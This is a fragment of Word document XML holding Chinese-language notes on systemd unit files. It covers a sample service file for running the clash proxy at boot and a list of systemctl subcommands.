    <w:p w14:paraId="3A09FA31" w14:textId="20545D5A" w:rsidR="00C85BE5" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.service</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89380E" w14:textId="1D40D8E5" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1045C4C3" w14:textId="5BCD8C8D" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8E809" w14:textId="7795E25F" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>network.target,auditd.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动后才启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594DC9A9" w14:textId="4C1A5EF5" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ConditionPathExists: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DC18C" w14:textId="2AB9AE01" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[Service]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D0C4A" w14:textId="30551D67" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EnvironmentFile:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量所在文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82E03F" w14:textId="4C55C55E" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行启动脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0306AE46" w14:textId="118195E5" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Restart: fail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时重启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA46BB" w14:textId="33603780" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[Install]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055C442" w14:textId="0D3E0404" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Alias:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务别名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619B615" w14:textId="7556C7EE" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WangtedBy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多用户模式下需要的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330DCB76" w14:textId="334331E7" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DE4210" w14:textId="225F5A52" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.target</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF2DF21" w14:textId="24858A12" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.target</w:t>
      </w:r>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义了一些基础的组件，供</w:t>
      </w:r>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.service</w:t>
      </w:r>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211915AB" w14:textId="5A6115DD" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5990A9D5" w14:textId="771C1E81" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.wants</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579FA49E" w14:textId="5C959D7C" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.wants</w:t>
      </w:r>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件定义了要执行的文件集合，每次执行，</w:t>
      </w:r>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.wants</w:t>
      </w:r>
      <w:r w:rsidRPr="0023120D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹里面的文件都会执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262C2E7" w14:textId="070CE042" w:rsidR="00BA3A23" w:rsidRDefault="00BA3A23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E343E95" w14:textId="77777777" w:rsidR="00462AA8" w:rsidRDefault="00462AA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F36E62" w14:textId="78998BEB" w:rsidR="00462AA8" w:rsidRDefault="00D36648" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>如何简单的编写</w:t>
      </w:r>
      <w:r w:rsidR="009C7BE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r w:rsidR="009C7BE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>开机启动某程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65543344" w14:textId="77777777" w:rsidR="009C7BE4" w:rsidRDefault="009C7BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29317472" w14:textId="70A4F71C" w:rsidR="009C7BE4" w:rsidRDefault="00642E3D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>clash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4EB428" w14:textId="1F7DEBF2" w:rsidR="00642E3D" w:rsidRPr="009C7BE4" w:rsidRDefault="00642E3D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00642E3D">
        <w:t>https://dreamacro.github.io/clash/introduction/service.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2045DFCC" w14:textId="77777777" w:rsidR="00462AA8" w:rsidRDefault="00462AA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32507B6E" w14:textId="446A74DE" w:rsidR="005615D2" w:rsidRPr="00462AA8" w:rsidRDefault="005615D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把可执行文件、配置文件挪到目标目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF2780" w14:textId="77777777" w:rsidR="009D5E3F" w:rsidRDefault="009D5E3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cp clash /usr/local/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFB35F7" w14:textId="77777777" w:rsidR="009D5E3F" w:rsidRDefault="009D5E3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cp config.yaml /etc/clash/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370AEC76" w14:textId="3251FDC1" w:rsidR="00462AA8" w:rsidRDefault="009D5E3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cp Country.mmdb /etc/clash/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D04C7" w14:textId="77777777" w:rsidR="00462AA8" w:rsidRDefault="00462AA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F793C7B" w14:textId="6A3A8368" w:rsidR="005615D2" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
      <w:r w:rsidRPr="006027EF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/systemd/system/clash.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D3844" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D471FB" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Description=Clash daemon, A rule-based proxy in Go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C25659B" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>After=network-online.target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7A05B" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8FB3F9" w14:textId="05CDDF00" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1989"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[Service]</w:t>
      </w:r>
      <w:r w:rsidR="00F813D5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF84D66" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Type=simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDF1C9" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Restart=always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F17A8B" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ExecStart=/usr/local/bin/clash -d /etc/clash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F70E20" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE59D1F" w14:textId="77777777" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[Install]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7202C" w14:textId="45C96A47" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>WantedBy=multi-user.target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCEBD0D" w14:textId="05920851" w:rsidR="005615D2" w:rsidRDefault="005615D2" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49198625" w14:textId="5644F301" w:rsidR="006027EF" w:rsidRDefault="006027EF" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A287FAC" w14:textId="7E3C7E52" w:rsidR="006027EF" w:rsidRDefault="008D13E6" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D13E6">
        <w:t>systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BB00FA" w14:textId="62C21AD1" w:rsidR="006027EF" w:rsidRDefault="008D13E6" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D13E6">
        <w:t>systemctl enable clash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F92772" w14:textId="0BF65C45" w:rsidR="006027EF" w:rsidRDefault="008D13E6" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D13E6">
        <w:t>systemctl start clash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79986E" w14:textId="77777777" w:rsidR="005615D2" w:rsidRDefault="005615D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB71638" w14:textId="77777777" w:rsidR="008D13E6" w:rsidRDefault="008D13E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>systemctl status clash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864E385" w14:textId="30DC4C98" w:rsidR="008D13E6" w:rsidRDefault="008D13E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>journalctl -xe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737C16D4" w14:textId="77777777" w:rsidR="008D13E6" w:rsidRDefault="008D13E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471E8C26" w14:textId="77777777" w:rsidR="00462AA8" w:rsidRDefault="00462AA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1403F38F" w14:textId="505E4D7E" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ystem</w:t>
      </w:r>
      <w:r>
        <w:t>子命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020FE3C8" w14:textId="234289B3" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了一组子命令来管理单个的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其命令格式为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E26D3E" w14:textId="4AA969ED" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>systemctl [command] [unit]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEE296" w14:textId="60518808" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40019E6B" w14:textId="32DC7A11" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：立刻启动后面接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101522B6" w14:textId="4F43ABE0" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：立刻关闭后面接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00454069" w14:textId="0F4432E9" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：立刻关闭后启动后面接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，亦即执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> stop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F95CC2" w14:textId="2747F9BB" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：不关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下，重新载入配置文件，让设置生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238D444" w14:textId="72259813" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：设置下次开机时，后面接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35641E" w14:textId="4661BC0F" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：设置下次开机时，后面接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会被启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05916209" w14:textId="2E7853C2" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：目前后面接的这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的状态，会列出有没有正在执行、开机时是否启动等信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55021C49" w14:textId="5931F7D1" w:rsidR="00384EE1" w:rsidRDefault="00384EE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>is-active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：目前有没有正在运行中。</w:t>
      </w:r>
    </w:p>
